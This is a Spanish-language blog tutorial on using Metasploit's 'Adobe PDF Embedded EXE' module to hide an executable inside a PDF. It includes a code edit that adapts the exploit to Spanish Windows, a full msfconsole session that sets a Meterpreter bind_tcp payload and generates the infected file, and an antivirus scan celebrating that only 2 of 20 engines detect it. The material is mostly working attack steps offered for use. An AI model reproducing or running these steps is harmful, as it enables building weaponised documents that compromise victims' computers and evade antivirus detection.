Retomando un poco lo que es la herramienta ‘Metasploit‘, encontré un exploit donde podemos realizar una incrustación de un archivo ejecutable dentro de un archivo de Adobe PDF.
Descripción del Exploit
Ubicación:/windows/fileformat/adobe_pdf_embedded_exe
Nombre:Adobe PDF Embedded EXE Social Engineering
Versión:0
Plataforma:Windows
Licencia:Metasploit Framework License (BSD)
Rango:Excelente
Proporciando por:Colin Ames amesc@attackresearch.com>
Objetivos disponibles:Adobe Reader v8.x, v9.x (Windows XP SP3 English)
Descripción:Este módulo del Metasploit incorpora una carga de un archivo PDF existente.
Como podemos ver, el exploit, solo funciona con sistema operativo windows xp en ingles (Windows XP … English), pero aquí lo haremos portable a un windows en español, ya que es él que nos interesa.
Después de esta breve definición del exploit, vamos a ver como funciona este exploit, primero que todo, para que nos funcione dentro de un sistema operativo windows xp en español, vamos a la linea 232 del exploit, donde reemplazamos este código:
-
232. dirs = [ «Desktop», «My Documents», «Documents» ]
por este:
-
232. dirs = [ «Desktop», «My Documents», «Documents», «Escritorio», «Mis Documentos»]
Como vemos de añadimos algunos parámetros necesarios para que nuestro exploit corra en un windows en ingles como también en un windows en español. Después de realizar esto, vamos a generar nuestro PoC!
Abrimos la consola del Metasploit, seleccionamos el exploit, y le ingresamos los parámetros necesarios y lo lanzamos. Inmediatamente se creara el PoC con el archivo pdf «infectado».
root@bt:/opt/metasploit3/msf3# msfconsole o 8 o o 8 8 8 ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P 8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8 8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8 8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8 ..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..: ::::::::::::::::::::::::::::::::::8::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::: =[ metasploit v3.4.0-dev [core:3.4 api:1.0] + -- --=[ 540 exploits - 256 auxiliary + -- --=[ 207 payloads - 23 encoders - 8 nops =[ svn r9040 updated today (2010.04.07) msf > use windows/fileformat/adobe_pdf_embedded_exe msf exploit(adobe_pdf_embedded_exe) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- EXENAME no The Name of payload exe. FILENAME evil.pdf no The output filename. INFILENAME yes The Input PDF filename. OUTPUTPATH ./data/exploits/ no The location to output the file. Exploit target: Id Name -- ---- 0 Adobe Reader v8.x, v9.x (Windows XP SP3 English) msf exploit(adobe_pdf_embedded_exe) > set OUTPUTPATH /root/ OUTPUTPATH => /root/ msf exploit(adobe_pdf_embedded_exe) > set FILENAME PoC_PDF_EXE.pdf FILENAME => PoC_PDF_EXE.pdf msf exploit(adobe_pdf_embedded_exe) > set EXENAME /root/cmd.exe EXENAME => /root/cmd.exe msf exploit(adobe_pdf_embedded_exe) > set payload windows/meterpreter/bind_tcp payload => windows/meterpreter/bind_tcp msf exploit(adobe_pdf_embedded_exe) > set INFILENAME /root/PoC_PDF_EXE_File.pdf INFILENAME => /root/PoC_PDF_EXE_File.pdf msf exploit(adobe_pdf_embedded_exe) > exploit[*] Started bind handler[*] Reading in '/root/PoC_PDF_EXE_File.pdf'...[*] Parsing '/root/PoC_PDF_EXE_File.pdf'...[*] Parsing Successful.[*] Using '/root/cmd.exe' as payload...[*] Creating 'PoC_PDF_EXE.pdf' file...[*] Generated output file /root/PoC_PDF_EXE.pdf[*] Exploit completed, but no session was created. msf exploit(adobe_pdf_embedded_exe) >
PD: El exploit trabaja con un payload de por medio, como vieron solo seleccione el payload bind_tcp, ya que no surge ningun efecto a la hora de ejecutar el PoC. Esto si seria necesario a la hora de ejecutar un payload convertido en ejecutable.
Nos genero el archivo PDF correctamente, ahora miremos nuestro PoC en acción.
Miremos que nos dice el Scanner de NoVirusThanks:
File Info
Report date: 2010-04-08 07:14:17 (GMT 1)
File name: PoC_PDF_EXE.pdf
File size: 1698671 bytes
MD5 Hash: 23d92e4f9b132150d002d014eb772529
SHA1 Hash: 20f0caceffefa8958ffa7638657393ae2d34e3c1
Detection rate: 2 on 20 (10% )
Status: INFECTED
Detections
a-squared – –
Avast – JS:Pdfka-XN [Expl]
AVG – –
Avira AntiVir – –
BitDefender – Exploit.PDF-Dropper.Gen
ClamAV – –
Comodo – –
Dr.Web – –
Ewido – –
F-PROT6 – –
G-Data – –
Ikarus T3 – –
Kaspersky – –
McAfee – –
NOD32 – –
Panda – –
Solo – –
TrendMicro – –
VBA32 – –
Zoner – –
Scan report generated by NoVirusThanks.org